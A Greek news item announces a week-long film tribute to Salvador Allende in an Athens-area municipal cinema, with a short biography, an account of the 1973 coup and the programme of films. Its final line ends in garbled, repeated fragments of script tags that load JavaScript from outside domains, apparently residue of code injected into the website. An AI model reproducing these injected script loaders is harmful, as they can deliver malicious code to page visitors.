Η 11η Σεπτεμβρίου του Σαλβαδόρ Αλιέντε

 

Η κινηματογραφική New Star, το Ιδρυμα Σαλβαδόρ Αλιέντε και η πρεσβεία της Χιλής στην Ελλάδα, διοργανώνουν 11–17 Σεπτεμβρίου, κινηματογραφικό αφιέρωμα στον Αλιέντε.

«…Θέλω να σας ευχαριστήσω για την εμπιστοσύνη που εναποθέσατε σε έναν άνθρωπο που ήταν μόνο ένας διερμηνέας της μεγάλης λαχτάρας για τη δικαιοσύνη…». Από τον τελευταίο λόγο του ηγέτη της Χιλής, Σαλβαδόρ Αλιέντε.

Με την ευκαιρία της συμπλήρωσης 41 χρόνων από τον θάνατο του προέδρου της Χιλής, Σαλαβαδόρ Αλιέντε, στις 11 Σεπτεμβρίου του 1973, ημέρα εκδήλωσης του πραξικοπήματος του Πινοσέτ, που αιματοκύλησε τη Χιλή επί 17 χρόνια, η εταιρεία διανομής κινηματογραφικών ταινιών New Star, το Ιδρυμα Σαλβαδόρ Αλιέντε και η πρεσβεία της Δημοκρατίας της Χιλής στην Ελλάδα, διοργανώνουν κινηματογραφικό αφιέρωμα στον Αλιέντε.

Στο πλαίσιο του αφιερώματος, που θα πραγματοποιηθεί 11-17 Σεπτεμβρίου, στον δημοτικό κινηματογράφο Αγιων Ανάργυρων New Star Cinema Μαρία-Ελενα Οναρ θα προβληθούν ταινίες (μεταξύ αυτών του Κώστα Γαβρά και του Μιχάλη Κακογιάννη) και ντοκιμαντέρ για τον Αλιέντε, παράλληλα με έκθεση φωτογραφίας, αφίσας και ντοκουμέντων.
Ο Σαλβαδόρ Αλιέντε την 11η Σεπτεμβρίου 1973

Ο Salvador Allende Gossens (1908 – 1973), πατέρας της νυν Προέδρου της χιλιανής Βουλής, Ιζαμπέλ Αλιέντε (και θείος της διάσημης συγγραφέα, με το ίδιο όνομα, Ιζαμπέλ Αλιέντε), υπήρξε ο πρώτος σοσιαλιστής Πρόεδρος της Χιλής (1970 – 1973).

Ο γιατρός και πολιτικός Σαλβαδόρ Αλιέντε, ιδρυτής του Σοσιαλιστικού Κόμματος της Χιλής, βουλευτής από τα 28 του χρόνια, ένας φωτισμένος αστός με βαθιά πίστη στους δημοκρατικούς θεσμούς, εξελέγη Πρόεδρος της Δημοκρατίας της Χιλής το 1970, στην καρδιά του Ψυχρού Πολέμου.

Στη σύντομη, τρίχρονη θητεία του, ο Αλιέντε επιχείρησε σειρά μεγάλων μεταρρυθμίσεων, όπως η ανακατανομή εκατομμυρίων στρεμμάτων γης σε ακτήμονες, ενώ ενέπνευσε στους Χιλιανούς την ελπίδα για πρόοδο και μετασχηματισμό της χώρας.

Ανατράπηκε από τον Αουγκούστο Πινοσέτ, τον άνθρωπο που ο ίδιος είχε θέσει επικεφαλής των ενόπλων δυνάμεων.

Την Τρίτη 11 Σεπτεμβρίου 1973, το προεδρικό μέγαρο της Χιλής δέχτηκε επίθεση από ξηράς και αέρος. Ο Αλιέντε δολοφονείται κατά την είσοδο των στρατευμάτων στο προεδρικό μέγαρο, αν και πολλά χρόνια μετά -το 2011, μετά από εκταφή της σορού και αυτοψία- αποκαλύπτεται ότι αυτοκτόνησε. Λίγο πριν από την εισβολή του στρατού, στις 9:10 το πρωί, ο Σαλβαδόρ Αλιέντε απευθύνθηκε μέσω του ραδιοφώνου για τελευταία φορά στον λαό της Χιλής.
Οι ταινίες του αφιερώματος είναι:

«Ο Αγνοούμενος» (Κώστας Γαβράς), «Γλυκιά Πατρίδα» (Μιχάλης Κακογιάννης), «Ματσούκα» (Andres Wood), «Βρέχει Πάνω απ’ το Σαντιάγο» (Helvio Soto), «Πουθενά» (Luis Sepulveda), «Σαλβαδόρ Αλιέντε» (Patricio Guzman), «The Black Pimpernel» (Åsa Faringer, Ulf Hultberg), «Υπόσχεση στους Νεκρούς: το Ταξίδι της Εξορίας του Άριελ Ντόρφμαν» (Peter Raymont), «Η Μάχη της Χιλής: Μέρος 1ο, Η Εξέγερση της Μπουρζουαζίας» (Patricio Guzman), «Η Μάχη της Χιλής: Μέρος 2ο, Το Πραξικόπημα» (Patricio Guzman), «Η Μάχη της Χιλής: Μέρος 3ο, Η Λαϊκή Εξουσία» (Patricio Guzman), «Υπόθεση Πινοσέτ» (Patricio Guzman), «Ο Πόλεμος με τις Μούμιες» (Heynowski/Scheuman), «Ψαλμός 18» (Heynowski/ Scheuman), «Οι Νεκροί δεν Σιωπούν» (Heynowski/Scheuman), «Αλύγιστος στη Φωτιά» (Heynowski/Scheumann), «Χιλή: Μέχρι πότε;» (David Bradbury), «Ξεχασμένη Μνήμη» (Niles Atallah),) «Νύχτα Πάνω απ’ τη Χιλή» (Sebastián Alarcón, Aleksandr Kosarev).

Info: Αγίας Παρασκευής 40, Αγιοι Ανάργυροι, τηλ. 210-2639208___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >